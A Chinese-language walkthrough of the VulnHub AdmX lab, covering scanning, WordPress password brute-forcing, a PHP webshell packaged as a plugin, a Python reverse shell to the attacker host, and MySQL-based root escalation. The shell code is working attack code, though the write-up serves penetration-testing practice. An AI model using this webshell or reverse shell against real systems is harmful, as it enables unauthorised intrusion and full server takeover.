AdmX

文章目录

• 前言
• 
  

  一、主机发现/端口扫描

• 
  

  二、路径爆破/匹配替换

• 
  

  三、密码爆破获得admin密码

• 
  

  四、漏洞利用

• 
  

  五、密码重用/MySQL提权

• 总结

---

前言

靶机地址：https://download.vulnhub.com/admx/AdmX_new.7z
难度：中(2个flag和root权限）
kali：10.0.2.4
靶机：10.0.2.7 192.168.159.145

---

一、主机发现/端口扫描

sudo nmap -sn 10.0.2.0/24
sudo nmap -p- 10.0.2.7

访问10.0.2.7

二、路径爆破/匹配替换

dirb http://10.0.2.7  发现http://10.0.2.7/wordpress

使用burpsuit抓包发现地址会跳转到192.168.159.145
进入Options进行替换，刷新页面

利用wpscan探测出用户名admin，进入到wordpress/wp-login.php登陆页面

wpscan --url http://10.0.2.7/wordpress --enumerate

三、密码爆破获得admin密码

wpscan --url http://10.0.2.7/wordpress -U admin -P /usr/share/wordlists/rockyou.txt

四、漏洞利用

在这里上传编写好的代码，将文件压缩成zip进行上传

/**

 * Plugin Name:Webshell

 * Plugin URI:https//yuanfh.github.io

 * Description:WP Webshell for Pentest

 * Version:1.0

 * Author:yuanfh

 * Author URI:https://yuanfh.github.io

 * License:https://yuanfh.github.io

 */

if(isset($_GET['cmd']))

    {

	    system($_GET['cmd']);

    }

?>

尝试访问http://10.0.2.7/wordpress/wp-content/plugins/shell.php?cmd=id

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.4",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn(["/bin/bash"])'

第一个flag获取成功，当前为wpadmin用户权限，需要进一步提权

五、密码重用/MySQL提权

可以看到在不需要密码的情况下执行/usr/bin/mysql -u root -D wordpress -p命令获得的是root权限

执行命令，尝试adam14密码成功获取 *** 作系统root权限

获取到root目录下第二个flag

---

总结

以上就是今天要讲的内容，本文简单讲述了AdmX_new靶机渗透过程，中间也可以使用更自动化的msf。

修改404.php文件加入一句话木马，也可以使用蚁剑连接进行进一步 *** 作。

涉及到的攻击方法

• 主机发现
• 端口扫描
• WEB路径爆破
• BP自动替换
• 密码爆破
• Wordpress漏洞利用
• NC反dShell升级
• 利用MySQL提权
• 另类提权方法